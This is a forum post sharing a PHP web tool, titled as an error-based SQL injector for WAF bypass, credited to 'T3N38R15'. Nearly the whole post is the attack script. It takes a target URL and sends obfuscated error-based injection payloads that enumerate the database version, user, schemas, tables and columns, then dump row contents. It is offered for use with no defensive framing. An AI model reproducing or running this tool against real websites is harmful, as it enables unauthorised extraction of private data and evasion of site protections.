Aerosol Posted December 16, 2014 Report Posted December 16, 2014 <?php @set_time_limit(0); if(empty($_POST)==0){ if(empty($_POST["opt1"])==0){ $Fd=false; $pb=array('1"','1' . chr(39),'1'); $_url = $_POST["url"]; foreach($pb as $zz){ $_buffer = LoadSite($_url . $zz, ""); if(preg_match("#You have an error in your SQL syntax#", $_buffer)){$Fd=true;break;} } if($Fd){ $seperator=''; foreach($pb as $zz){ $fg=$_url . $zz . '+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1+--+f+--+'; $_buffer=LoadSite($fg,""); if(preg_match("#Duplicate entry#",$_buffer)){$seperator=$zz;break;} } if($seperator==''){echo "NOTHING UP HERE";exit();} echo '<table><tr><td valign="top">'; $fg=$_url . $seperator . '+or+1+group+by+concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2))+hav?ing+min(0)+or+1+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); $version=$_buffer1[0];$user=$_buffer1[1];$database=$_buffer1[2]; echo "Version : " . $version . "</br>User : " . $user . "</br>database : " . $database; $fg=$_url . $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,count(schema_name),0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+0,1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); $dbcount=$_buffer1[1]; echo '</br>DbCount : ' . $dbcount . '</br></td><td><table border="3"><tr><td>Databases : </td></tr>'; for ($i=0;$i<$dbcount; $i++){ echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">'; $fg=$_url . $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(schema_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+'.$i.',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>'; echo '<input type="hidden" name="nameinbase" value="' . String2Hex($_buffer1[1]) . '">'; echo '<input type="hidden" name="url" value="' . $_url . '">'; echo '<input type="hidden" name="opt2" value="1">'; echo '<input type="hidden" name="seperator" value="'; switch($seperator){ case '1"':echo "1";break; case '1' . chr(39):echo "2";break; case '1':echo "3";break; } echo '"></form></td></tr>'; } echo "</table><td></tr></table>"; } }elseif(empty($_POST["opt2"])==0){ $_url = $_POST["url"]; $seperator = $_POST["seperator"]; $sepe=GetSeperatorByInteger($seperator); $fg=$_url . $sepe .'+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(table_name),0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); $cta=$_buffer1[1]; echo '<table border="3"><tr><td>Tables From ' . Hex2String($_POST["nameinbase"]) . ' : (Total: '.$cta.') </td></tr>'; for ($i=0;$i<$cta; $i++){ echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">'; $fg = $_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(table_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+LIMIT+'.$i.',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>'; echo '<input type="hidden" name="nameinbase" value="' . $_POST["nameinbase"] . '">'; echo '<input type="hidden" name="nameinbase2" value="' . String2Hex($_buffer1[1]) . '">'; echo '<input type="hidden" name="url" value="' . $_url . '">'; echo '<input type="hidden" name="opt3" value="1">'; echo '<input type="hidden" name="seperator" value="' . $seperator . '">'; echo "</form></td></tr>"; } }elseif(empty($_POST["opt3"])==0){ $_url = $_POST["url"]; $seperator = $_POST["seperator"]; $sepe=GetSeperatorByInteger($seperator); $fg = $_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(column_name),0x27,0x7e)+FROM+/*!information_schema.columns*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+AND+table_name=0x'.$_POST["nameinbase2"].'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); $cta=$_buffer1[1]; echo '<table border="3"><tr><td>columns from ' . Hex2String($_POST["nameinbase2"]) . ' in Database ' . Hex2String($_POST["nameinbase"]) . ' (Total: '.$cta.')</td></tr>'; for ($i=0;$i<$cta; $i++){ echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">'; $fg=$_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(select+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000+(column_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!50000information_schema.columns*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+AND+table_name=0x'.$_POST["nameinbase2"].'+LIMIT+'.$i.',1))+FROM+/*!50000information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode("~",$lde[1]); echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>'; echo '<input type="hidden" name="nameinbase" value="' . $_POST["nameinbase"] . '">'; echo '<input type="hidden" name="nameinbase2" value="' . $_POST["nameinbase2"] . '">'; echo '<input type="hidden" name="nameinbase3" value="' . String2Hex($_buffer1[1]) . '">'; echo '<input type="hidden" name="url" value="' . $_url . '">'; echo '<input type="hidden" name="opt4" value="1">'; echo '<input type="hidden" name="seperator" value="' . $seperator . '">'; echo "</form></td></tr>"; } echo '</table>'; }elseif(empty($_POST["opt4"])==0){ $_url = $_POST["url"]; $seperator = $_POST["seperator"]; $sepe=GetSeperatorByInteger($seperator); $fg = $_url . $sepe .'+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count('.Hex2String($_POST["nameinbase3"]).'),0x27,0x7e)+FROM+'.Hex2String($_POST["nameinbase"]).'.'.Hex2String($_POST["nameinbase2"]).'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); $cta=$_buffer1[1]; echo '<table border="3"><tr><td>Items : (Total: '.$_buffer1[1].')</td></tr>'; for ($i=0;$i<$cta; $i++){ $fg=$_url .$sepe . '+and+(select+1+FROM(select+count(*),concat/*!50000*/((select+concat/*!50000*/(0x7e,0x27,'.Hex2String($_POST["nameinbase3"]).',0x27,0x7e)+FROM+'.Hex2String($_POST["nameinbase"]).'.'.Hex2String($_POST["nameinbase2"]).'+LIMIT+'.$i.',1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); echo '<tr><td>' . $i . '</td><td>' . $_buffer1[1] . '</td></tr>'; } echo '</table'; } }else{ ?><style type="text/css">#sbz {text-align: center;color: #000;font-size: 20px;font-weight: bold;line-height: 0.8em;letter-spacing: 0.2em;margin:0;text-shadow: 0 1px 20px #00FF00, 0 0 5px #00FF00, 0 0px 30px #00FF00, 1px 0 3px #00FF00;}</style><html><head><title>T3N38R15 Injector for WAF Bypass</title></head><body><b id="sbz"><font size="100"></br>T3N38R15</br></br></br>Error Based SQL Injector</br></br></br></font></b><form method="post"><input size="80" name="url" value="http://example.com/index.php?id="><input value="inject" type="submit"><input type="hidden" name="opt1" value="1"></form></br>Greets to Team M4DL33Ts</body></html><?php }function GetSeperatorByInteger($int){ switch($seperator){ case '1':return '1"'; case '2':return '1' . chr(39); case '3':return '1'; } return '';}function String2Hex($string){ $hex=''; for ($i=0; $i < strlen($string); $i++){ $hex .= dechex(ord($string[$i])); } return $hex;}function Hex2String($hex){ $string=''; for ($i=0; $i < strlen($hex)-1; $i+=2){ $string .= chr(hexdec($hex[$i].$hex[$i+1])); } return $string;}function LoadSite($url, $postdata){ $agent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"; $ch = curl_init($url); if ($ch){ curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,CURLOPT_USERAGENT, $agent); curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1); if (isset($postdata)){ curl_setopt($ch,CURLOPT_POST, 1); curl_setopt($ch,CURLOPT_POSTFIELDS, $postdata);} $tmp = curl_exec ($ch); curl_close ($ch); } return $tmp;}?>Credits to : T3N38R15 Quote